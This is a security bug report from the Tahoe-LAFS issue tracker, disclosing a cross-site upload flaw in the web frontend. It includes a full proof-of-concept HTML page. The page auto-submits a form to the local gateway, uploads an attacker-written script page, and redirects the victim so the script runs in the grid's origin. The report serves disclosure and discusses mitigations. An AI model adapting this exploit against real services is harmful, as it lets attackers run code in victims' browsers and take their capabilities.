Opened at 2012-11-15T02:47:10Z

Last modified at 2013-09-14T17:41:18Z

#1859 new defect

Proof-of-concept attack: Upload and execute attacker controlled js from any domain. — at Initial Version

Reported by: nejucomo Owned by: davidsarah
Priority: major Milestone: undecided
Component: code-frontend-web Version: 1.9.2
Keywords: security javascript same-origin capleak websec Cc: frederik.braun+tahoe@…
Launchpad Bug:

Description

Proof of Concept Attack

The following proof of concept shows how an html file loaded from any domain into (some) browsers with javascript enabled can inject an attacker controlled script into a grid, and *then* cause the user to execute that script in the domain of the grid: 

<html>
<head>
<script>

var PAYLOAD = '\x3chtml\x3e\x3chead\x3e\x3cscript\x3ealert("OH NOES! WHY ATTACKER CODE IN MAI DOMAIN " + document.domain + "?!")\x3c/script\x3e\x3c/head\x3e\x3c/html\x3e';

window.onload = function () {
  var payload_input = document.getElementById('payload_input');
  payload_input.value = PAYLOAD

  var the_form = document.getElementById('the_form');
  the_form.submit();
}

</script>
</head>

<body id="body">

<p>
demo attack:
</p>

<p>
This page attempts to inject an attacker controlled script into a <a
href="https://tahoe-lafs.org">tahoe-lafs</a> grid, no matter which domain
this file is loaded from.
</p>

<form id="the_form"
      method="POST"
      action="http://127.0.0.1:3456/uri?t=upload&when_done=/uri/%25(uri)s?filename=payload.html"
      enctype="multipart/form-data"
      >
<input id="payload_input" type="text" name="file"></input>
</form>

</body>
</html>

Mitigations:

There are several moving parts at work here. The when_done parameter with uri substitution was very convenient.

I think an upload capability would be the most consistent and thorough solution. Removing bits and pieces which may otherwise be useful, like when_done, feels like a piecemeal defense.

Requiring CSRF tokens may be more comprehensive, but also doesn't sit well with the rest of the capability model. (A CSRF token would be a bit like a "make a this kind of http request" temporary capability.)

Related Tickets:

  • #615 is more about boot-strapping an attack rather than illicitly gaining victim capabilities.
  • #1215 is about adding CORS support and how that may create a vulnerability; this script demonstrates even without CORS support similar vulnerabilities already exist.

Change History (0)

Note: See TracTickets for help on using tickets.